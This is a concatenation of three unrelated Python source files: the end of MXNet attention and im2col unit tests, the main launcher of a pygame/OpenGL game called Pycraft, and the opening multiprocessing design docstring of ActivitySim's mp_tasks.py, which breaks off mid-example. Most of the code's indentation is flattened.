v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
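    # worked example (illustrative): spatial=30, kernel=3, stride=2, dilate=2, pad=1
    # -> padded size 32, dilated kernel 2 * (3 - 1) + 1 = 5, output (32 - 5) // 2 + 1 = 14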
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
|
main.py
|
print("Started <Pycraft_main>")
class Startup:
def __init__(Class_Startup_variables):
try:
import tkinter as tk
Class_Startup_variables.mod_Tkinter__tk = tk # [Class_Startup_variables] mod (module) (module name) (subsection of module) (name references)
import tkinter.ttk # Class _ <class_name> _ variables
Class_Startup_variables.mod_Tkinter_ttk_ = tkinter.ttk
from tkinter import messagebox
Class_Startup_variables.mod_Tkinter_messagebox_ = messagebox
from PIL import Image, ImageFilter, ImageGrab, ImageTk
Class_Startup_variables.mod_PIL_Image_ = Image
Class_Startup_variables.mod_PIL_ImageFilter_ = ImageFilter
Class_Startup_variables.mod_PIL_ImageTk_ = ImageTk
Class_Startup_variables.mod_PIL_ImageGrab_ = ImageGrab
import pygame
Class_Startup_variables.mod_Pygame__ = pygame
import numpy
Class_Startup_variables.mod_Numpy__ = numpy
import os
Class_Startup_variables.mod_OS__ = os
import sys
Class_Startup_variables.mod_Sys__ = sys
import random
Class_Startup_variables.mod_Random__ = random
import time
Class_Startup_variables.mod_Time__ = time
import pygame.locals
Class_Startup_variables.mod_Pygame_locals_ = pygame.locals
import OpenGL
Class_Startup_variables.mod_OpenGL__ = OpenGL
import OpenGL.GL
Class_Startup_variables.mod_OpenGL_GL_ = OpenGL.GL
import OpenGL.GLU
Class_Startup_variables.mod_OpenGL_GLU_ = OpenGL.GLU
import OpenGL.GLUT
Class_Startup_variables.mod_OpenGL_GLUT_ = OpenGL.GLUT
import moderngl
Class_Startup_variables.mod_ModernGL__ = moderngl
import moderngl_window
Class_Startup_variables.mod_ModernGL_window_ = moderngl_window
import pyautogui
Class_Startup_variables.mod_Pyautogui__ = pyautogui
import psutil
Class_Startup_variables.mod_Psutil__ = psutil
import timeit
Class_Startup_variables.mod_Timeit__ = timeit
import subprocess
Class_Startup_variables.mod_Subprocess__ = subprocess
import traceback
Class_Startup_variables.mod_Traceback__ = traceback
import datetime
Class_Startup_variables.mod_Datetime__ = datetime
import ctypes
Class_Startup_variables.mod_Ctypes__ = ctypes
import json
Class_Startup_variables.mod_JSON__ = json
import threading
Class_Startup_variables.mod_Threading__ = threading
import cpuinfo
Class_Startup_variables.mod_CPUinfo__ = cpuinfo
import array
Class_Startup_variables.mod_Array__ = array
import GPUtil
Class_Startup_variables.mod_GPUtil__ = GPUtil
from tabulate import tabulate
Class_Startup_variables.mod_Tabulate_tabulate_ = tabulate
from pyrr import Matrix44
Class_Startup_variables.mod_Pyrr_Matrix44_ = Matrix44
Class_Startup_variables.mod_urllib_request_ = None
moderngl.create_standalone_context()
os.environ['SDL_VIDEO_CENTERED'] = '1'
Class_Startup_variables.mod_Pygame__.init()
import PycraftStartupTest
Class_Startup_variables.mod_PycraftStartupTest__ = PycraftStartupTest
import StartupAnimation
Class_Startup_variables.mod_StartupAnimation__ = StartupAnimation
import DisplayUtils
Class_Startup_variables.mod_DisplayUtils__ = DisplayUtils
import GetSavedData
Class_Startup_variables.mod_GetSavedData__ = GetSavedData
import ThemeUtils
Class_Startup_variables.mod_ThemeUtils__ = ThemeUtils
import HomeScreen
Class_Startup_variables.mod_HomeScreen__ = HomeScreen
import SoundUtils
Class_Startup_variables.mod_SoundUtils__ = SoundUtils
import DrawingUtils
Class_Startup_variables.mod_DrawingUtils__ = DrawingUtils
import CaptionUtils
Class_Startup_variables.mod_CaptionUtils__ = CaptionUtils
import Credits
Class_Startup_variables.mod_Credits__ = Credits
import TkinterUtils
Class_Startup_variables.mod_TkinterUtils__ = TkinterUtils
import Achievements
Class_Startup_variables.mod_Achievements__ = Achievements
import CharacterDesigner
Class_Startup_variables.mod_CharacterDesigner__ = CharacterDesigner
import Settings
Class_Startup_variables.mod_Settings__ = Settings
import Benchmark
Class_Startup_variables.mod_Benchmark__ = Benchmark
import ExBenchmark
Class_Startup_variables.mod_ExBenchmark__ = ExBenchmark
import OGLbenchmark
Class_Startup_variables.mod_OGLbenchmark__ = OGLbenchmark
import base
Class_Startup_variables.mod_Base__ = base
import ShareDataUtil
Class_Startup_variables.mod_Globals__ = ShareDataUtil
import TextUtils
Class_Startup_variables.mod_TextUtils__ = TextUtils
import Inventory
Class_Startup_variables.mod_Inventory__ = Inventory
import ImageUtils
Class_Startup_variables.mod_ImageUtils__ = ImageUtils
import MapGUI
Class_Startup_variables.mod_MapGUI__ = MapGUI
import ThreadingUtil
Class_Startup_variables.mod_ThreadingUtil__ = ThreadingUtil
import IntegratedInstaller
Class_Startup_variables.mod_IntegInstaller__ = IntegratedInstaller
Class_Startup_variables.aa = True
Class_Startup_variables.AccentCol = (237, 125, 49)
Class_Startup_variables.aFPS = 0
Class_Startup_variables.BackgroundCol = [30, 30, 30]
Class_Startup_variables.base_folder = os.path.dirname(__file__)
Class_Startup_variables.cameraANGspeed = 3.5
Class_Startup_variables.clock = pygame.time.Clock()
Class_Startup_variables.Collisions = [False, 0]
Class_Startup_variables.CompletePercent = 0
Class_Startup_variables.ctx = 0
Class_Startup_variables.Load_Progress = 0
Class_Startup_variables.ConnectionPermission = None
Class_Startup_variables.ConnectionStatus = False
Class_Startup_variables.crash = False
Class_Startup_variables.CurrentlyPlaying = None
Class_Startup_variables.Data_aFPS_Min = 60
Class_Startup_variables.Data_aFPS = []
Class_Startup_variables.Data_aFPS_Max = 1
Class_Startup_variables.Data_CPUUsE_Min = 60
Class_Startup_variables.Data_CPUUsE = []
Class_Startup_variables.Data_CPUUsE_Max = 1
Class_Startup_variables.Data_eFPS_Min = 60
Class_Startup_variables.Data_eFPS = []
Class_Startup_variables.Data_eFPS_Max = 1
Class_Startup_variables.Data_MemUsE_Min = 60
Class_Startup_variables.Data_MemUsE = []
Class_Startup_variables.Data_MemUsE_Max = 1
Class_Startup_variables.Devmode = 0
Class_Startup_variables.Display = 0
Class_Startup_variables.eFPS = 60
Class_Startup_variables.FanSky = True
Class_Startup_variables.FanPart = True
Class_Startup_variables.FontCol = (255, 255, 255)
Class_Startup_variables.FOV = 70
Class_Startup_variables.FromPlay = False
Class_Startup_variables.Fullscreen = False
Class_Startup_variables.FPS = 60
Class_Startup_variables.FullscreenX, Class_Startup_variables.FullscreenY = pyautogui.size()
Class_Startup_variables.GameError = None
Class_Startup_variables.G3Dscale = 600000
Class_Startup_variables.GetScreenGraphics = True
Class_Startup_variables.HUD_Surface = None
Class_Startup_variables.Iteration = 1
Class_Startup_variables.lastRun = "29/09/2021"
Class_Startup_variables.Load3D = True
Class_Startup_variables.LoadMusic = True
Class_Startup_variables.music = True
Class_Startup_variables.musicVOL = 5
Class_Startup_variables.Numpy_map_vertices = 0
Class_Startup_variables.Outdated = False
Class_Startup_variables.Progress_Line = []
Class_Startup_variables.ProgressMessageText = "Initiating"
Class_Startup_variables.realHeight = 720
Class_Startup_variables.realWidth = 1280
Class_Startup_variables.RecommendedFPS = 60
Class_Startup_variables.RenderFOG = True
Class_Startup_variables.RunFullStartup = False
Class_Startup_variables.SecondFontCol = (100, 100, 100)
Class_Startup_variables.SavedWidth = 1280
Class_Startup_variables.SavedHeight = 720
Class_Startup_variables.ShapeCol = (80, 80, 80)
Class_Startup_variables.skybox_texture = 0
Class_Startup_variables.sound = True
Class_Startup_variables.soundVOL = 75
Class_Startup_variables.Stop_Thread_Event = Class_Startup_variables.mod_Threading__.Event()
Class_Startup_variables.SettingsPreference = "Medium"
Class_Startup_variables.theme = False
Class_Startup_variables.ThreadStatus = "Running"
Class_Startup_variables.Timer = 0
Class_Startup_variables.TotalNumUpdate = 0
Class_Startup_variables.Total_move_x = 0
Class_Startup_variables.Total_move_y = 0
Class_Startup_variables.Total_move_z = 0
Class_Startup_variables.TotalRotation = 0
Class_Startup_variables.Total_Vertices = 0
Class_Startup_variables.version = "0.9.3"
Class_Startup_variables.vertex = 0
Class_Startup_variables.X = 0
Class_Startup_variables.Y = 0
Class_Startup_variables.Z = 0
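            # start the background worker threads: variable checking, CPU usage logging and adaptive mode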
Class_Startup_variables.Thread_StartLongThread = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_ThreadingUtil__.ThreadingUtils.StartVariableChecking, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_StartLongThread.start()
Class_Startup_variables.Thread_StartLongThread.name = "Thread_StartLongThread"
Class_Startup_variables.Thread_GetCPUMetrics = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_ThreadingUtil__.ThreadingUtils.StartCPUlogging, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_GetCPUMetrics.start()
Class_Startup_variables.Thread_GetCPUMetrics.name = "Thread_GetCPUMetrics"
Class_Startup_variables.Thread_AdaptiveMode = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_ThreadingUtil__.ThreadingUtils.AdaptiveMode, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_AdaptiveMode.start()
Class_Startup_variables.Thread_AdaptiveMode.name = "Thread_AdaptiveMode"
Class_Startup_variables.mod_Globals__.Share.initialize(Class_Startup_variables)
import GameEngine
Class_Startup_variables.mod_MainGameEngine__ = GameEngine
except Exception as error:
print(error)
try:
                import tkinter as tk
                from tkinter import messagebox
                root = tk.Tk()
                root.withdraw()
                # use the freshly imported messagebox in case the failed import happened
                # before mod_Tkinter_messagebox_ was assigned
                messagebox.showerror("Startup Fail", "Missing required modules")
                quit()
except:
try:
Class_Startup_variables.mod_Pygame__.quit()
sys.exit("0.0.0 -Thank you for playing")
except:
quit()
def crash(ErrorREPORT):
Class_Startup_variables.Stop_Thread_Event.set()
if not ErrorREPORT == None:
Class_Startup_variables.mod_Pygame__.quit()
Class_Startup_variables.mod_Time__.sleep(1.01)
Class_Startup_variables.mod_Pygame__.init()
Class_Startup_variables.mod_Pygame__.mixer.stop()
try:
Message = Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.SaveTOconfigFILE(Class_Startup_variables)
Class_Startup_variables.mod_Pygame__.display.quit()
Class_Startup_variables.mod_Pygame__.init()
Display = Class_Startup_variables.mod_Pygame__.display.set_mode((1280, 720))
icon = Class_Startup_variables.mod_Pygame__.image.load(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder, ("Resources\\General_Resources\\Icon.jpg"))).convert()
Class_Startup_variables.mod_Pygame__.display.set_icon(icon)
Class_Startup_variables.mod_Pygame__.display.set_caption(f"Pycraft: An Error Occurred")
MessageFont = Class_Startup_variables.mod_Pygame__.font.Font(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder,("Fonts\\Book Antiqua.ttf")), 15)
ErrorMessageText = MessageFont.render(str(ErrorREPORT), True, (255,0,0))
ErrorMessageTextWidth = ErrorMessageText.get_width()
ErrorMessageTextHeight = ErrorMessageText.get_height()
Display = Class_Startup_variables.mod_Pygame__.display.set_mode((1280,720))
IconImage = Class_Startup_variables.mod_Pygame__.image.load(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder,("Resources\\Error_Resources\\Icon.jpg")))
Class_Startup_variables.mod_Pygame__.display.set_icon(IconImage)
image = Class_Startup_variables.mod_Pygame__.image.load(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder,("Resources\\Error_Resources\\Error_Message.png")))
Clock = Class_Startup_variables.mod_Pygame__.time.Clock()
while True:
Display.fill((20,20,20))
Display.blit(image, (0,0))
Display.blit(ErrorMessageText, ((((1280/2)-ErrorMessageTextWidth)/2), (720-ErrorMessageTextHeight)/2))
for event in Class_Startup_variables.mod_Pygame__.event.get():
if event.type == Class_Startup_variables.mod_Pygame__.QUIT:
Class_Startup_variables.Thread_StartLongThread.join()
Class_Startup_variables.Thread_AdaptiveMode.join()
Class_Startup_variables.Thread_GetCPUMetrics.join()
Class_Startup_variables.mod_Pygame__.quit()
Class_Startup_variables.mod_Sys__.exit(f"0.1.0- Thank you for playing")
Class_Startup_variables.mod_Pygame__.display.flip()
Clock.tick(30)
except Exception as error:
Class_Startup_variables.mod_Sys__.exit(f"0.2.0- {error} Thank you for playing")
else:
try:
Class_Startup_variables.mod_Pygame__.quit()
except Exception as error:
Class_Startup_variables.mod_Sys__.exit(f"0.3.0- {error} Thank you for playing")
quit()
else:
Class_Startup_variables.mod_Sys__.exit("0.4.0- Thank you for playing")
quit()
Class_Startup_variables = Startup()
try:
Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.ReadMainSave(Class_Startup_variables)
except Exception as FileError:
Report = Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.RepairLostSave(Class_Startup_variables)
ErrorString = "Unable to access saved data, we have atttempted to repair the missing data, please try again", FileError
Message = "0.0.0- " + str(ErrorString)
Startup.crash(Message)
if Class_Startup_variables.ConnectionPermission == None:
Class_Startup_variables.mod_TkinterUtils__.TkinterInfo.GetPermissions(Class_Startup_variables)
if Class_Startup_variables.ConnectionPermission == True:
import urllib.request
Class_Startup_variables.mod_urllib_request_ = urllib.request
Class_Startup_variables.ConnectionStatus = Class_Startup_variables.mod_IntegInstaller__.CheckConnection.test(Class_Startup_variables)
if Class_Startup_variables.ConnectionStatus == True:
Class_Startup_variables.Thread_Get_Outdated = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_IntegInstaller__.IntegInstaller.CheckVersions, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_Get_Outdated.start()
Class_Startup_variables.Thread_Get_Outdated.name = "Thread_Get_Outdated"
Message = Class_Startup_variables.mod_PycraftStartupTest__.StartupTest.PycraftSelfTest(Class_Startup_variables)
if not Message == None:
Message = "0.0.3- " + str(Message)
Startup.crash(Message)
if Class_Startup_variables.theme == False:
Message = Class_Startup_variables.mod_ThemeUtils__.DetermineThemeColours.GetThemeGUI(Class_Startup_variables)
if not Message == None:
Message = "0.0.4- " + str(Message)
Startup.crash(Message)
Message = Class_Startup_variables.mod_ThemeUtils__.DetermineThemeColours.GetColours(Class_Startup_variables)
if not Message == None:
Message = "0.0.5- " + str(Message)
Startup.crash(Message)
Message = Class_Startup_variables.mod_StartupAnimation__.GenerateStartupScreen.Start(Class_Startup_variables)
if not Message == None:
Message = "0.0.6- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
while True:
if Class_Startup_variables.Command == "saveANDexit":
Message = Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.SaveTOconfigFILE(Class_Startup_variables)
if not Message == None:
Message = "0.0.7- " + str(Message)
Startup.crash(Message)
else:
Class_Startup_variables.Stop_Thread_Event.set()
Class_Startup_variables.Thread_StartLongThread.join()
Class_Startup_variables.Thread_AdaptiveMode.join()
Class_Startup_variables.Thread_GetCPUMetrics.join()
Class_Startup_variables.mod_Pygame__.quit()
Class_Startup_variables.mod_Sys__.exit("0.5.0- Thank you for playing") # 0 = Order of running, 5 = 5th occurrence down page
elif Class_Startup_variables.Command == "Credits":
Message = Class_Startup_variables.mod_Credits__.GenerateCredits.Credits(Class_Startup_variables)
if not Message == None:
Message = "0.0.8- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Achievements":
Message = Class_Startup_variables.mod_Achievements__.GenerateAchievements.Achievements(Class_Startup_variables)
if not Message == None:
Message = "0.0.9- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "CharacterDesigner":
Message = Class_Startup_variables.mod_CharacterDesigner__.GenerateCharacterDesigner.CharacterDesigner(Class_Startup_variables)
if not Message == None:
Message = "0.0.10- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Settings":
Message = Class_Startup_variables.mod_Settings__.GenerateSettings.settings(Class_Startup_variables)
if not Message == None:
Message = "0.0.11- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Benchmark":
Message = Class_Startup_variables.mod_Benchmark__.GenerateBenchmarkMenu.Benchmark(Class_Startup_variables)
if not Message == None:
Message = "0.0.12- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Play":
Message = Class_Startup_variables.mod_MainGameEngine__.CreateEngine.Play(Class_Startup_variables)
if Message == None:
Message = Class_Startup_variables.GameError
if not Message == None:
Message = "0.0.13- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.mod_Pygame__.init()
Class_Startup_variables.FromPlay = True
Message = Class_Startup_variables.mod_DisplayUtils__.DisplayUtils.SetDisplay(Class_Startup_variables)
if not Message == None:
Message = "0.0.14- " + str(Message)
Startup.crash(Message)
elif Class_Startup_variables.Command == "Inventory":
Message = Class_Startup_variables.mod_Inventory__.GenerateInventory.Inventory(Class_Startup_variables)
if not Message == None:
Message = "0.0.15- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Play"
elif Class_Startup_variables.Command == "MapGUI":
Message = Class_Startup_variables.mod_MapGUI__.GenerateMapGUI.MapGUI(Class_Startup_variables)
if not Message == None:
Message = "0.0.16- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Play"
else:
Message, Class_Startup_variables.Command = Class_Startup_variables.mod_HomeScreen__.GenerateHomeScreen.Home_Screen(Class_Startup_variables)
if not Message == None:
Message = "0.0.17- " + str(Message)
Startup.crash(Message)
|
mp_tasks.py
|
# ActivitySim
# See full license in LICENSE.txt.
import sys
import os
import time
import logging
import multiprocessing
import traceback
from collections import OrderedDict
import yaml
import numpy as np
import pandas as pd
from activitysim.core import config
from activitysim.core import inject
from activitysim.core import mem
from activitysim.core import pipeline
from activitysim.core import tracing
from activitysim.core import util
from activitysim.core.config import setting
logger = logging.getLogger(__name__)
LAST_CHECKPOINT = '_'
MEM_TRACE_TICKS = 5
"""
mp_tasks - activitysim multiprocessing overview
Activitysim runs a list of models sequentially, performing various computational operations
on tables. Model steps can modify values in existing tables, add columns, or create additional
tables. Activitysim provides the facility, via expression files, to specify vectorized operations
on data tables. The ability to vectorize operations depends upon the independence of the
computations performed on the vectorized elements.
Python is agonizingly slow performing scalar operations sequentially on large datasets, so
vectorization (using pandas and/or numpy) is essential for good performance.
Fortunately most activity based model simulation steps are row independent at the household,
person, tour, or trip level. The decisions for one household are independent of the choices
made by other households. Thus it is (generally speaking) possible to run an entire simulation
on a household sample with only one household, and get the same result for that household as
you would running the simulation on a thousand households. (See the shared data section below
for an exception to this highly convenient situation.)
The random number generator supports this goal by providing streams of random numbers
for each household and person that are mutually independent and repeatable across model runs
and processes.
To the extent that simulation model steps are row independent, we can implement most simulations
as a series of vectorized operations on pandas DataFrames and numpy arrays. These vectorized
operations are much faster than sequential python because they are implemented by native code
(compiled C) and are to some extent multi-threaded. But the benefits of numpy multi-threading are
limited because they only apply to atomic numpy or pandas calls, and as soon as control returns
to python it is single-threaded and slow.
Multi-threading is not an attractive strategy to get around the python performance problem because
of the limitations imposed by python's global interpreter lock (GIL). Rather than struggling with
python multi-threading, this module uses the python multiprocessing library to parallelize certain models.
Because of activitysim's modular and extensible architecture, we don't hardwire the multiprocessing
architecture. The specification of which models should be run in parallel, how many processors
should be used, and the segmentation of the data between processes are all specified in the
settings config file. For conceptual simplicity, the single-processing model is treated as
dominant (because even though in practice multiprocessing may be the norm for production runs,
the single-processing model will be used in development and debugging, and keeping it dominant
will tend to concentrate the multiprocessing-specific code in one place and prevent multiprocessing
considerations from permeating the code base and obscuring the model-specific logic).
The primary function of the multiprocessing settings is to identify distinct stages of
computation, to specify how many simultaneous processes should be used to perform them,
and to specify how the data should be apportioned between those processes. We assume that
the data can be apportioned between subprocesses according to the index of a single primary table
(e.g. households), or else belongs to derivative or dependent tables that reference that table's index
(primary key) with a ref_col (foreign key) sharing the name of the primary table's key.
Generally speaking, we assume that any new tables that are created are directly dependent on the
previously existing tables, and that all rows in new tables are either attributable to previously
existing rows in the pipeline tables, or belong to global utility tables that are identical across
sub-processes.
Note: There are a few exceptions to 'row independence', such as school and location choice models,
where the model behavior is externally constrained or adjusted. For instance, we want school
location choice to match known aggregate school enrollments by zone. Similarly, a parking model
(not yet implemented) might be constrained by availability. These situations require special
handling.
::
models:
### mp_initialize step
- initialize_landuse
- compute_accessibility
- initialize_households
### mp_households step
- school_location
- workplace_location
- auto_ownership_simulate
- free_parking
### mp_summarize step
- write_tables
multiprocess_steps:
- name: mp_initialize
begin: initialize_landuse
- name: mp_households
begin: school_location
num_processes: 2
slice:
tables:
- households
- persons
- name: mp_summarize
begin: write_tables
The multiprocess_steps setting above annotates the models list to indicate that the simulation
should be broken into three steps.
The first multiprocess_step (mp_initialize) begins with the initialize_landuse step and is
implicitly single-process because there is no 'slice' key indicating how to apportion the tables.
This first step includes all models listed in the 'models' setting up until the first step
of the next multiprocess_step.
The second multiprocess_step (mp_households) starts with the school location model and continues
through auto_ownership_simulate. The 'slice' info indicates that the tables should be sliced by
households, and that persons is a dependent table, so any person with a ref_col (a foreign key
column with the same name as the households table index) referencing a household record should be
taken to 'belong' to that household. Similarly, any other table that either shares an index
(i.e. has an index with the same name) with the households or persons table, or has a ref_col to
either of their indexes, should also be considered a dependent table.
The num_processes setting of 2 indicates that the pipeline should be split in two, and half of the
households should be apportioned into each subprocess pipeline, and all dependent tables should
likewise be apportioned accordingly. All other tables (e.g. land_use) that do not share an index (name)
or have a ref_col should be considered mirrored and be included in their entirety.
The primary table is sliced by num_processes-sized strides (e.g. for num_processes == 2, the
sub-processes get every second record, starting at offsets 0 and 1 respectively). All other dependent
table slices are based (directly or indirectly) on this primary stride segmentation of the primary
table index.
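For illustration only (a minimal pandas sketch, not taken from the implementation), the stride
apportionment and the subsequent concatenation look roughly like this, assuming a households
table indexed by household_id::
    import numpy as np
    import pandas as pd
    def stride_slice(df, num_processes, i):
        # sub-process i gets every num_processes-th row, starting at offset i
        return df[np.arange(len(df)) % num_processes == i]
    households = pd.DataFrame({'size': [1, 2, 3, 4, 5]},
                              index=pd.Index([11, 12, 13, 14, 15], name='household_id'))
    slices = [stride_slice(households, 2, i) for i in range(2)]
    # coalescing simply concatenates the apportioned slices back together
    assert pd.concat(slices).sort_index().equals(households)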
Two separate sub-processes are launched (num_processes == 2), and each is passed the name of its
apportioned pipeline file. They execute independently and, if they terminate successfully, their
contents are then coalesced into a single pipeline file whose tables should be essentially
the same as if it had been generated by a single process.
We assume that any new tables that are created by the sub-processes are directly dependent on the
previously existing primary tables or are mirrored. Thus we can coalesce the sub-process pipelines by
concatenating the primary and dependent tables and simply retaining a copy of the mirrored tables
(since they should all be identical).
The third multiprocess_step (mp_summarize) then is handled in single-process mode and runs the
write_tables model, writing the results, but also leaving the tables in the pipeline, with
essentially the same tables and results as if the whole simulation had been run as a single process.
"""
"""
shared data
Although multiprocessing subprocesses each have their (apportioned) pipeline, they also share some
data passed to them by the parent process. There are essentially two types of shared data.
read-only shared data
Skim files are read-only and take up a lot of RAM, so we share them across sub-processes, loading
them into shared-memory (multiprocessing.sharedctypes.RawArray) in the parent process and passing
them to the child sub-processes when they are launched/forked. (Unlike ordinary python data,
sharedctypes are not pickled and reconstituted, but are passed through to the subprocess by address
when it is launched/forked by multiprocessing.Process.) Since they are read-only, no Locks are required to
access their data safely. The receiving process needs to know to wrap them using numpy.frombuffer,
but they can thereafter be treated as ordinary numpy arrays.
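For illustration only (a standalone sketch, not the activitysim code; the actual buffers are
allocated via abm.tables.skims and abm.tables.shadow_pricing), the RawArray/frombuffer pattern
looks roughly like this::
    import multiprocessing
    import numpy as np
    def child(raw_buffer, shape):
        # wrap the shared RawArray as a numpy array - no copy and, being read-only, no Lock needed
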